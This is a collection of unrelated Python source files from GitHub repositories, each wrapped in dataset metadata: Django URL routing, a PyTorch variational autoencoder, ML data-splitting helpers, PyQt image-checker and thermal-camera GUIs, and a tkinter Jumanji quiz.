Assignments/Uke38/Uke38.py","file_name":"Uke38.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23845145483","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'login'\nurlpatterns = [\n path('', views.LoginView.as_view(), name='login'),\n path('login/', views.LoginView.as_view(), name='login'),\n path('register/', views.RegisterView.as_view(), name='register'),\n path('logout/', views.logout_view, name='logout')\n # path('login_request/', views.LoginView.login_request, name='login_request')\n # path('', views.index, name=\"index\")\n # path('/', views.DetailView.as_view(), name='detail'),\n # path('/results/', views.ResultsView.as_view(), name='results'),\n # path('/vote/', views.vote, name='vote'),\n]\n","repo_name":"Yikai-coder/Public-Opinion-Emergency-System","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"18798571102","text":"from typing import Optional, List, Union\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom segmentation_models_pytorch.encoders import get_encoder\nfrom segmentation_models_pytorch.decoders.unet.decoder import \\\n CenterBlock, DecoderBlock\nfrom segmentation_models_pytorch.base import (\n SegmentationHead\n)\n\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n encoder_channels,\n decoder_channels,\n n_blocks=5,\n use_batchnorm=True,\n attention_type=None,\n center=False,\n z_dim: int = 10\n ):\n super().__init__()\n\n if n_blocks != len(decoder_channels):\n raise ValueError(\n \"Model depth is {}, but you provide \"\n \"`decoder_channels` for {} blocks.\".format(\n n_blocks, len(decoder_channels)\n )\n )\n\n # remove first skip with same spatial resolution\n encoder_channels = encoder_channels[1:]\n # reverse channels to start from head of encoder\n encoder_channels = encoder_channels[::-1]\n\n # computing blocks input and output channels\n head_channels = encoder_channels[0]\n in_channels = [head_channels] + list(decoder_channels[:-1])\n out_channels = decoder_channels\n\n if center:\n self.center = CenterBlock(\n head_channels, head_channels, use_batchnorm=use_batchnorm\n )\n else:\n self.center = nn.Identity()\n\n # combine decoder keyword arguments\n kwargs = dict(\n use_batchnorm=use_batchnorm, attention_type=attention_type\n )\n blocks = [\n DecoderBlock(in_ch, 0, out_ch, **kwargs)\n for in_ch, out_ch in zip(in_channels, out_channels)\n ]\n self.blocks = nn.ModuleList(blocks)\n self.linear = nn.Linear(z_dim, 512)\n\n def forward(self, z, encoder_output_size: int = 7):\n x = self.linear(z)\n x = x.view(z.size(0), 512, 1, 1)\n x = F.interpolate(x, size=encoder_output_size)\n for i, decoder_block in enumerate(self.blocks):\n x = decoder_block(x, None)\n return x\n\n\nclass AutoEncoder(nn.Module):\n def __init__(\n self,\n encoder_name: str = \"resnet34\",\n encoder_depth: int = 5,\n encoder_weights: Optional[str] = \"imagenet\",\n decoder_use_batchnorm: bool = True,\n decoder_channels: List[int] = (256, 128, 64, 32, 16),\n decoder_attention_type: Optional[str] = None,\n in_channels: int = 3,\n z_dim: int = 10,\n activation: Optional[Union[str, callable]] = None\n ):\n super().__init__()\n\n self.encoder = get_encoder(\n encoder_name,\n in_channels=in_channels,\n depth=encoder_depth,\n weights=encoder_weights,\n )\n\n self.decoder = Decoder(\n encoder_channels=self.encoder.out_channels,\n decoder_channels=decoder_channels,\n n_blocks=encoder_depth,\n use_batchnorm=decoder_use_batchnorm,\n center=True if encoder_name.startswith(\"vgg\") else False,\n attention_type=decoder_attention_type,\n z_dim=z_dim\n )\n\n self.segmentation_head = SegmentationHead(\n in_channels=decoder_channels[-1],\n out_channels=in_channels,\n activation=activation,\n kernel_size=3,\n )\n\n self.linear = nn.Linear(512, 2 * z_dim)\n self.z_dim = z_dim\n\n def check_input_shape(self, x):\n h, w = x.shape[-2:]\n output_stride = self.encoder.output_stride\n if h % output_stride != 0 or w % output_stride != 0:\n new_h = (h // output_stride + 1) * output_stride if h % output_stride != 0 else h\n new_w = (w // output_stride + 1) * output_stride if w % output_stride != 0 else w\n raise RuntimeError(\n f\"Wrong input shape height={h}, width={w}. Expected image height and width \"\n f\"divisible by {output_stride}. Consider pad your images to shape ({new_h}, {new_w}).\"\n )\n\n def reparameterize(self, x):\n x = F.adaptive_avg_pool2d(x, 1)\n x = x.view(x.size(0), -1)\n x = self.linear(x)\n mean = x[:, :self.z_dim]\n logvar = x[:, self.z_dim:]\n std = torch.exp(logvar / 2) # in log-space, squareroot is divide by two\n epsilon = torch.randn_like(std)\n return epsilon * std + mean\n\n def forward(self, x):\n \"\"\"Sequentially pass `x` trough model`s encoder, decoder and heads\"\"\"\n\n self.check_input_shape(x)\n\n encoder_output = self.encoder(x)[-1]\n z = self.reparameterize(encoder_output)\n decoder_output = self.decoder(z, encoder_output.shape[-1])\n result = self.segmentation_head(decoder_output)\n\n return result\n","repo_name":"m0nteg0/data_cleaner","sub_path":"data_cleaner/models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20044189020","text":"\"\"\"\nData structures not part of the databank\n\"\"\"\nfrom tools.helper import set_def_props\nfrom tools.grade import Grade\n\nfrom collections import defaultdict\n\nclass DataX:\n # Number of teachers, sections, bands (set to 0)\n props_v = ['nteas', 'nsects', 'ns', 'nbds']\n\n # mt1_sects: Sections that can meet once per day\n # btb: Exceptions to the BTB limit rule\n # xs: Exceptions to individual schedule\n # clash: Conflicting sections\n props_l = ['mt1_sects', 'btb', 'xs', 'clash']\n \n # mts_sects: list of sections for each meet num\n # bands: sections for each band name\n # tea_sects: list of sections for each teacher\n # spots: sections size\n # tbd_courses: TBD courses\n # stud_crs_map: student-course map\n # stud_sects: student-sections map\n # chunked: set of chunked student ids\n props_d = ['new_ids', 'meetmap', 'mts_sects', 'bands', 'sect_names', 'tea_sects', 'spots', 'tbd_courses', 'stud_crs_map', 'stud_sects', 'chunk_weights', 'chunked', 'chunk_reps']\n \n def __init__(self, grades):\n # Default\n set_def_props(self, DataX.props_v, DataX.props_l, DataX.props_d)\n self.setup(grades)\n\n def setup(self, specs):\n \"\"\"Initialize structures\"\"\"\n self.grades = {g : Grade(g) for g in specs.grades}\n # assignment to courses/sections\n self.decisions = defaultdict(list)\n # set of chunked student ids\n #self.chunked = set()\n","repo_name":"pleatcher/Projects","sub_path":"ScheduleGenerator/code/blocks/datax.py","file_name":"datax.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19559528941","text":"import numpy as np\n# my own implementations of various tools, but ended up using mostly\n# sklearn algos (for safety). I do data scaling.\n\nclass Scaler(object):\n # scale input data\n def __init__(self, data):\n self.mu = np.mean(data)\n self.sig = np.std(data)\n\n def __call__(self, unscaled_data):\n scaled_data = (unscaled_data - self.mu)/self.sig\n return scaled_data\n\ndef bootstrap_with_replacement(x,y):\n # Simple bootstrap, simply resample with replacement\n inds = np.random.choice(len(x), size = len(x), replace = True)\n return x[inds], y[inds]\n\n# def bootstrap_dataset(x, y, train_fraction = 0.8): # better bootstrap ?\n# # Leave one out bootstrap\n# n_samples = len(x)\n# n_train = int(n_samples*train_percentage)\n# test_mask = np.ones(n_samples, dtype = np.bool)\n# train_inds = np.sort(np.random.choice(n_samples, size = n_train, replace = False))\n# test_mask[train_inds] = False\n# return split_data(x, y, train_inds, test_mask)\n\ndef split_data(x, y, train_fraction = 0.8):\n # split data into train/test\n n_samples = len(x)\n n_train = int(n_samples*train_fraction)\n\n train_inds = np.sort(np.random.choice(n_samples, size = n_train, replace = False))\n test_mask = np.ones(n_samples, dtype = np.bool)\n test_mask[train_inds] = False\n\n x_train = x[train_inds]\n y_train = y[train_inds]\n x_test = x[test_mask]\n y_test = y[test_mask]\n return x_train, y_train, x_test, y_test\n","repo_name":"markusbp/fys_stk4155","sub_path":"project1/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20260193243","text":"num=int(input())\nlength=[]\nblack=[]\nstrip=[]\nfor i in range(num):\n x,y=map(int,input().split(\" \"))\n length.append(x)\n black.append(y)\n strip.append(input())\n\n\nfor s in strip:\n if len(s)==1 and s[0]=='W':\n print(1)\n break\n elif len(s)==1 and s[0]=='B':\n print(0)\n break\n\n indexes=[]\n for i in range(len(s)):\n if s[i]=='B':\n indexes.append(i)\n \n \n\n\n\n","repo_name":"BiluAilu/A2SV-Practice","sub_path":"Data Structure/Two pointer/Black and White Stripe.py","file_name":"Black and White Stripe.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74063421568","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing CheckTool.\n\"\"\"\nimport sys, threading\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtCore import pyqtSignature, pyqtSignal, QObject\n\nimport os\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nfrom PIL import Image\n\nfrom Ui_Checker import Ui_Dialog\n\n\nclass CheckTool(QDialog, Ui_Dialog, QObject):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n printSignal = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QDialog.__init__(self, parent)\n self.setupUi(self)\n self.printSignal.connect(self.printLog)\n\n\n\n\n\n @pyqtSignature(\"\")\n def on_check_clicked(self):\n rootDir = self.lineEdit.text()\n dir = unicode(rootDir, 'utf-8')\n if os.path.exists(dir):\n #self.checkDir(dir)\n thread = threading.Thread(target=self.checkDir, args=(dir,))\n thread.setDaemon(True)\n thread.start()\n else:\n self.printLog(u\"--------------请选择有效文件夹!!----------------\")\n\n\n @pyqtSignature(\"\")\n def on_file_clicked(self):\n s = QtGui.QFileDialog.getExistingDirectory(self,u\"选择文件夹\", \"/\")\n self.lineEdit.setText(unicode(s, \"utf8\"))\n\n def checkDir(self, rootDir):\n self.printSignal.emit(u\"--------------检测开始!----------------\")\n list_dirs = os.walk(rootDir)\n for root, dirs, files in list_dirs:\n # for d in dirs:\n # print os.path.join(root, d)\n for f in files:\n if f.endswith('.jpg') or f.endswith('.png'):\n self.checkPic(os.path.join(root, f))\n if f.endswith('.txt'):\n self.checkTxt(os.path.join(root, f))\n self.printSignal.emit(u\"--------------检测结束!----------------\")\n\n def checkPic(self, PicPath):\n file = os.path.basename(PicPath)\n size = os.path.getsize(PicPath)\n #返回图形对象\n im = Image.open(PicPath)\n #获取图片宽高\n iw, ih = im.size\n\n ##1-2-3-4-像素1100*1390(≤300KB)\n if file.startswith(\"1\") or file.startswith(\"2\") or file.startswith(\"3\") or file.startswith(\n \"4\") or file.startswith(\"15\"):\n if size > 300 * 1024:\n msg = u\"%s 文件大小为%d,超出规定大小300KB \" % (PicPath, size)\n self.printSignal.emit(msg)\n if iw > 1100 or ih > 1390:\n msg = u\"%s 文件像素为%d*%d,不符合规定大小1100*1390!\" % (PicPath, iw, ih)\n self.printSignal.emit(msg)\n\n ##5-7-像素235*297 (≤30KB)\n if file.startswith(\"5\") or file.startswith(\"7\"):\n if size > 30 * 1024:\n msg = u\"%s文件大小为%d,超出规定大小300KB \" % (PicPath, size)\n self.printSignal.emit(msg)\n if iw > 235 or ih > 297:\n msg = u\"%s 文件像素为%d*%d,不符合规定大小235*297!\" % (PicPath, iw, ih)\n self.printSignal.emit(msg)\n\n ##6-像素750*10000px,≤2MB\n if file.startswith(\"6\"):\n if size > 2 * 1024 * 1024:\n msg = u\"%s 文件大小为%d,超出规定大小2MB \" % (PicPath, size)\n self.printSignal.emit(msg)\n if iw > 750 or ih > 10000:\n msg = u\" %s 文件像素为%d*%d,不符合规定大小750*10000!\" % (PicPath, iw, ih)\n self.printSignal.emit(msg)\n\n\n def checkTxt(self, TxtPath):\n file = open(TxtPath, 'r')\n for (num, line) in enumerate(file):\n if line.find(\"taobao.com\") != -1 or line.find(\"tmall.com\") != -1:\n msg = u\"%s 文件中第%d行包含字符串 taobao.com或者tmall.com,请检查!\" % (TxtPath, num)\n self.printSignal.emit(msg)\n file.close()\n\n def printLog(self, msg):\n self.textBrowser.append(msg)\n self.textBrowser.moveCursor(QtGui.QTextCursor.End)\n\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n ck = CheckTool()\n ck.show()\n sys.exit(app.exec_())\n","repo_name":"li24361/Checker","sub_path":"Checker.py","file_name":"Checker.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5168034405","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n###################################################################################################\n\nfrom PyQt4.QtCore import QTimer, SIGNAL, SLOT, Qt, QPointF, QPoint, QRectF, QRect\nfrom PyQt4.QtGui import QMessageBox, QTextEdit, QDialog, QPolygonF,QPainter, QPen, QColor \nfrom PyQt4.QtGui import QBrush, QMainWindow,QWidget,QToolTip,QApplication, QFont,QIcon,QAction\nfrom PyQt4.QtGui import QFrame,QListWidget,QComboBox,QCheckBox,QPushButton,QProgressBar,QLineEdit,QLabel\nfrom PyQt4.QtGui import QTextBrowser, QCursor, qApp, QDesktopWidget\nfrom PyQt4.QtGui import QGraphicsView, QGraphicsScene, QPicture, QPaintDevice, QStaticText\n\n###################################################################################################\nclass ThermoFrame(QFrame):\n\n # =======================================================================\n def __init__(self, parent=None):\n\n # -------------------------------------------------------------------\n QFrame.__init__(self, parent);\n\n # -------------------------------------------------------------------\n self.setFrameShape( 0x0001 );\n \"\"\"\n QFrame.NoFrame 0 QFrame draws nothing\n QFrame.Box 0x0001 QFrame draws a box around its contents\n QFrame.Panel 0x0002 QFrame draws a panel to make the contents appear raised or sunken\n QFrame.StyledPanel 0x0006 draws a rectangular panel with a look that depends on the current GUI style. It can be raised or sunken.\n QFrame.HLine 0x0004 QFrame draws a horizontal line that frames nothing (useful as separator)\n QFrame.VLine 0x0005 QFrame draws a vertical line that frames nothing (useful as separator)\n QFrame.WinPanel 0x0003 rectangular panel that can be raised or sunken like those in Windows 2000\n \"\"\"\n\n # -------------------------------------------------------------------\n\n\n #self.setFrameStyle(QFrame.NoFrame);\n\n # -------------------------------------------------------------------\n self.PARENT = parent;\n self.INITED = False;\n self.ANTIALIASING = True;\n self.W = 0;\n self.H = 0;\n\n self.MATRIX = {};\n self.MATRIX_W = 36;\n self.MATRIX_H = 61;\n self.PX_SIZE = [20, 10];\n self.BORDER_W = 2;\n self.ML = 20;\n self.MT = 30;\n \n self.setGeometry(self.ML, self.MT, self.MATRIX_W*self.PX_SIZE[0]+ (self.BORDER_W*2), self.MATRIX_H*self.PX_SIZE[1] + (self.BORDER_W*2) );\n self.setStyleSheet( \"QFrame{ background-color: #000; color: #fff; border-style: solid; border-width: \"+str(self.BORDER_W)+\"px; border-color: #fff; }\" );\n \n # -------------------------------------------------------------------\n self.BTNS_ML = self.MATRIX_W*self.PX_SIZE[0]+self.BORDER_W*2+30+self.ML;\n self.LABELS_STYLE = \"QLabel{ color: #fff;}\"\n\n # -----------------------------------\n # STATUS LABEL\n self.STATUS_LABEL_DISCONN = \"QLabel{ color: #000; font-weight: bold; background-color: #F00; padding-left: 10px; line-height: 26px; }\";\n self.STATUS_LABEL_CONN = \"QLabel{ color: #000; font-weight: bold; background-color: #FF0; padding-left: 10px; line-height: 26px; }\";\n self.STATUS_LABEL_RUNNING = \"QLabel{ color: #000; font-weight: bold; background-color: #0F0; padding-left: 10px; line-height: 26px; }\";\n\n self.STATUS_LABEL = QLabel( \"Disconnected\" , self.PARENT);\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n self.STATUS_LABEL.setGeometry( 280, 2, 200, 26 );\n\n # serial port\n self.SERIAL_PORT_INPUT_LABEL = QLabel( \"Serial port:\" , self.PARENT);\n self.SERIAL_PORT_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+0, 200, 25 );\n self.SERIAL_PORT_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_PORT_INPUT = QLineEdit( self.PARENT.SERIAL_PORT , self.PARENT);\n self.SERIAL_PORT_INPUT.setGeometry( self.BTNS_ML, self.MT+25, 200, 25 );\n\n # -----------------------------------\n # serial baudrate\n self.SERIAL_BAUDRATE_INPUT_LABEL = QLabel( \"Baudrate: (speed e.g 9600)\" , self.PARENT);\n self.SERIAL_BAUDRATE_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+50, 200, 25 );\n self.SERIAL_BAUDRATE_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_BAUDRATE_INPUT = QLineEdit( str(self.PARENT.SERIAL_BAUDRATE) , self.PARENT);\n self.SERIAL_BAUDRATE_INPUT.setGeometry( self.BTNS_ML, self.MT+75, 200, 25 );\n\n # -----------------------------------\n # serial timeout\n self.SERIAL_TIMEOUT_INPUT_LABEL = QLabel( \"Serial timeout:\" , self.PARENT);\n self.SERIAL_TIMEOUT_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+100, 200, 25 );\n self.SERIAL_TIMEOUT_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_TIMEOUT_INPUT = QLineEdit( str(self.PARENT.SERIAL_TIMEOUT) , self.PARENT);\n self.SERIAL_TIMEOUT_INPUT.setGeometry( self.BTNS_ML, self.MT+125, 200, 25 );\n\n # -----------------------------------\n # buttons\n self.CONNECT_BTN = QPushButton(\"Connect\", self.PARENT);\n self.CONNECT_BTN.setGeometry( self.BTNS_ML, self.MT+165, 200, 25 );\n self.CONNECT_BTN.clicked.connect( self.CONNECT );\n\n\n self.START_BTN = QPushButton(\"Start\", self.PARENT);\n self.START_BTN.setGeometry( self.BTNS_ML, self.MT+195, 200, 25 );\n self.START_BTN.clicked.connect( self.START );\n\n self.STOP_BTN = QPushButton(\"Stop\", self.PARENT);\n self.STOP_BTN.setGeometry( self.BTNS_ML, self.MT+225, 200, 25 );\n self.STOP_BTN.clicked.connect( self.STOP );\n\n self.HEAD_UP_BTN = QPushButton(\"HEAD-UP: (10)\", self.PARENT);\n self.HEAD_UP_BTN.setGeometry( self.BTNS_ML, self.MT+300, 200, 25 );\n self.HEAD_UP_BTN.clicked.connect( self.PARENT.HEAD_UP );\n\n self.HEAD_DN_BTN = QPushButton(\"HEAD-DOWN: (10)\", self.PARENT);\n self.HEAD_DN_BTN.setGeometry( self.BTNS_ML, self.MT+330, 200, 25 );\n self.HEAD_DN_BTN.clicked.connect( self.PARENT.HEAD_DOWN );\n\n\n # -------------------------------------------------------------------\n self.arrow_style = \"QLabel{ font-size: 14px; font-weight: bold; color: #F00; }\";\n self.SCAN_POS_ARROW_L_ML = self.ML-10;\n self.SCAN_POS_ARROW_L_MT = self.MT+2;\n\n self.SCAN_POS_ARROW_L = QLabel(u\"█\", self.PARENT);\n self.SCAN_POS_ARROW_L.setStyleSheet( self.arrow_style );\n self.SCAN_POS_ARROW_L.setGeometry( self.SCAN_POS_ARROW_L_ML, self.SCAN_POS_ARROW_L_MT, 10, 10 );\n\n self.SCAN_POS_ARROW_R_ML = self.ML+self.MATRIX_W*self.PX_SIZE[0]+self.BORDER_W*3;\n self.SCAN_POS_ARROW_R_MT = self.MT+2;\n\n self.SCAN_POS_ARROW_R = QLabel(u\"█\", self.PARENT);\n self.SCAN_POS_ARROW_R.setStyleSheet( self.arrow_style );\n self.SCAN_POS_ARROW_R.setGeometry( self.SCAN_POS_ARROW_R_ML, self.SCAN_POS_ARROW_R_MT, 10, 10 );\n\n # -------------------------------------------------------------------\n self._CANDEL_G_COLOR = QColor(0,225,0, 255 );\n self._CANDEL_R_COLOR = QColor(225,0,0, 255 );\n\n # -------------------------------------------------------------------\n self.INIT();\n\n # -------------------------------------------------------------------\n \n # =======================================================================\n def CONNECT(self):\n\n # -------------------------------------------------------------------\n self.PARENT.SERIAL_PORT = str(self.SERIAL_PORT_INPUT.text() );\n self.PARENT.SERIAL_BAUDRATE = int( self.SERIAL_BAUDRATE_INPUT.text() );\n self.PARENT.SERIAL_TIMEOUT = float( self.SERIAL_TIMEOUT_INPUT.text() );\n\n if self.PARENT.CONNECT():\n self.STATUS_LABEL.setText(\"Connected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_CONN );\n\n else:\n self.STATUS_LABEL.setText(\"Disconnected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def START(self):\n\n # -------------------------------------------------------------------\n if self.PARENT.START():\n self.STATUS_LABEL.setText(\"Running\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_RUNNING );\n\n else:\n self.STATUS_LABEL.setText(\"Disconnected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def STOP(self):\n\n # -------------------------------------------------------------------\n if self.PARENT.STOP():\n self.STATUS_LABEL.setText(\"Connected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_CONN );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def INIT( self ):\n\n # -------------------------------------------------------------------\n try:\n\n row = 0;\n\n while row < self.MATRIX_H:\n self.MATRIX[ \"_\"+str(row) ] = [53 for x in xrange(self.MATRIX_W)]\n row += 1;\n\n\n self.show();\n self.INITED = True;\n\n except Exception as _err:\n\n self.EXCEPT( \"\", _err );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def poly(self, _pts):\n \n pass;\n \"\"\"\n for x in xrange(0, len(_pts)):\n if self._CANDELS[x][0] == None:\n self._CANDELS[x][0] = 0;\n if self._CANDELS[x][1] == None:\n self._CANDELS[x][1] = 0;\n\n return QPolygonF(map(lambda p: QPointF(*p), _pts))\n \"\"\"\n\n # =======================================================================\n def paintEvent(self, event):\n\n # -------------------------------------------------------------------\n Painter = QPainter()\n Painter.begin(self)\n #Painter.restore();\n # -------------------------------------------------------------------\n if self.ANTIALIASING:\n \n Painter.setRenderHint(Painter.Antialiasing);\n\n # -------------------------------------------------------------------\n Painter.setPen(QPen(QColor(\"#333333\"), 0)); # main canvas bg\n\n for row in self.MATRIX:\n\n row_num = int(row.replace(\"_\", \"\"));\n\n for row_index in xrange(0, len( self.MATRIX[row] )):\n \n \"\"\"\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n \"\"\"\n\n if self.MATRIX[row][row_index] < 50: # blue\n Painter.setBrush(QBrush( QColor( 0, 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 100: # purple\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 150: # orange\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], int(self.MATRIX[row][row_index]/2), 0) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 200: # yellow \n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], self.MATRIX[row][row_index], 0 ) )); # QColor( 255, 100, 20 )\n\n else: # white \n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], self.MATRIX[row][row_index], int(self.MATRIX[row][row_index]/2 ) ) )); # QColor( 255, 100, 20 )\n\n \n Painter.drawRect( self.BORDER_W+row_index*self.PX_SIZE[0], self.BORDER_W+row_num*self.PX_SIZE[1], self.PX_SIZE[0], self.PX_SIZE[1]);\n\n # -------------------------------------------------------------------\n #Painter.save();\n Painter.end();\n # -------------------------------------------------------------------\n\n # =======================================================================\n def UPDATE_ROW( self ):\n\n # -------------------------------------------------------------------\n try:\n\n tmp = self.PARENT.MATRIX_ROW.split(\"|\");\n row = \"_\"+tmp[0];\n\n self.SCAN_POS_ARROW_L.setGeometry( self.SCAN_POS_ARROW_L_ML, self.SCAN_POS_ARROW_L_MT + (self.PX_SIZE[1]*int(tmp[0])), 10, 10 );\n self.SCAN_POS_ARROW_R.setGeometry( self.SCAN_POS_ARROW_R_ML, self.SCAN_POS_ARROW_R_MT + (self.PX_SIZE[1]*int(tmp[0])), 10, 10 );\n\n raw_data = tmp[1].split(\",\");\n\n data = [];\n\n for i in xrange(0, self.MATRIX_W):\n\n ii = raw_data[i].strip();\n if ii != \"\":\n self.MATRIX[ \"_\"+tmp[0]][i] = int( ii );\n\n self.update();\n\n except Exception as _err:\n self.EXCEPT( \"UPDATE_ROW: \", _err );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def UPDATE( self ):\n\n # -------------------------------------------------------------------\n # 60|76,66,67,64,69,71,73,75,75,73,72,74,|105,104,104,103,103,102,103,103,103,103,103,103,|89,84,81,83,81,80,80,79,79,80,79,79,\n # -------------------------------------------------------------------\n with open(\"data.list\", \"r\") as FS:\n\n for LL in FS:\n\n tmp = LL.split(\"|\");\n row = \"_\"+tmp[0];\n\n raw_data = tmp[1].split(\",\");\n\n data = [];\n\n for i in raw_data:\n\n i = i.strip();\n if i != \"\":\n data.append( int(i.strip()));\n\n self.MATRIX[ \"_\"+tmp[0]] = data;\n\n # -------------------------------------------------------------------\n self.update();\n # -------------------------------------------------------------------\n\n # =======================================================================\n def EXCEPT(self, _info=\"no-info\", _exception=\"\"):\n\n # -------------------------------------------------------------------\n print( str(_info)+\" : \"+str(_exception) );\n # -------------------------------------------------------------------\n\n # =======================================================================\n\n###################################################################################################\n","repo_name":"ch3ll0v3k/thermal-camera","sub_path":"modules/thermo_frame.py","file_name":"thermo_frame.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2534599640","text":"from tkinter import *\n#from tkinter import filedialog\nfrom PIL import ImageTk, Image\n#from tkinter import messagebox\n#import os\n#cmd = \"curl https://github.com/ksu-is/Can-You-Survive-Jumanji-Quiz/blob/main/Nigel.png -o Nigel.png \"\n#os.system(cmd)\n\n#Nigel_img = open('Nigel.png', 'r+')\n\nroot = Tk()\nroot.title(\"Can You Survive?: Jumanji Quiz\")\n#root.iconbitmap('jewel.jpg')\nroot.geometry(\"300x300\")\n\nresults =3\n\ndef results_clicker():\n #global pop\n #pop = Toplevel(root)\n #pop.title(\"Game Results\")\n #pop.geometry(\"250x150\")\n #pop.config(bg= \"green\")\n\n if results >= 5:\n global pop\n pop = Toplevel(root)\n pop.title(\"Game Results\")\n pop.geometry(\"250x150\")\n pop.config(bg= \"green\")\n global nigel\n nigel = PhotoImage(file= 'Nigel.png') #\"https://github.com/ksu-is/Can-You-Survive-Jumanji-Quiz/blob/main/Nigel.png\")\n nigel_label = Label(image= nigel)\n nigel_label.pack()\n pop_label = Label (pop, text=\"Congratulations!\\nYou survived Jumanji.\", bg= \"green\", fg= \"white\", font= (\"arial\", 12))\n pop_label.pack(pady=10)\n\n my_frame = Frame(pop, bg= \"green\")\n my_frame.pack(pady=5)\n\n nigel_pic = Label(my_frame, image= nigel, borderwidth=0)\n nigel_pic.grid(row=0, column=0, padx=10)\n \n\n okay= Button(my_frame, text= \"Okay\", command = my_frame.quit)\n okay.grid(row= 0, column=1, padx=10)\n elif results < 5:\n global popup\n popup = Toplevel(root)\n popup.title(\"Game Results\")\n popup.geometry(\"250x150\")\n popup.config(bg= \"black\")\n global russell\n russell= ImageTk.PhotoImage(file= 'Russell.jpg')\n #russell = PhotoImage(file='Russell.png')\n russell_label = Label(image= russell)\n russell_label.pack()\n pop_2_label = Label (popup, text=\"Oh no! You didn't survive.\\nBetter luck next time.\", bg= \"black\", fg= \"white\", font= (\"arial\", 12))\n pop_2_label.pack(pady=10)\n\n my_2_frame = Frame(popup, bg= \"black\")\n my_2_frame.pack(pady=5)\n\n russell_pic = Label(my_2_frame, image= russell, borderwidth=0)\n russell_pic.grid(row=0, column=0, padx=10)\n\n okay_2= Button(my_2_frame, text= \"Okay\", command = my_2_frame.quit)\n okay_2.grid(row= 0, column=1, padx=10)\n\n\n\n\n\n\n\nresults_button= Button(root, text= \"Results\", command= results_clicker)\nresults_button.pack(pady=50)\n\nmy_label = Label(root, text= \"\")\nmy_label.pack(pady=20)\n\n\n\n\nroot.mainloop()\n\nprint(\"Thanks for playing!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#print(\"Welcome to the Jumanji Quiz!\", \"\\nThis quiz will test whether you could survive Jumanji.\")\n#root = Tk()\n#root.title(\"Can You Survive?: Jumanji Quiz\")\n#main_img= ImageTk.PhotoImage(Image.open(\"maincharacters.jpg\"))\n#my_label= Label(image= main_img)\n#my_label.pack()\n#button_quit= Button(root, text= \"Press Exit and return to quiz in terminal\", command= root.quit)\n#button_quit.pack()\n\n#character_choice = input(\"Which character do you want to play as (Choose a letter)?:\\nA)Dr.Smoulder Bravestone\\nB)Ruby Roundhouse\\nC)Professor Shelly Oberon\\nD)Franklin Finbar 'Mouse'\\n\").upper()\n\n#correct = 3\n#def results_click():\n #if correct >= 5:\n #print(correct, \"/10\")\n # win= messagebox.showinfo(\"Results\",\"Congratulations! You survived Jumanji.\")\n \n # if correct <5:\n #print(correct, \"/10\")\n #lose= messagebox.showinfo(\"Results\",\"Oh no! You didn't survive.\\nBetter luck next time.\")\n \n#results_button= Button(root, text= \"Results\", command= results_click).pack()\n#results_button.geometry(\"350x350\")\n#mainloop()\n 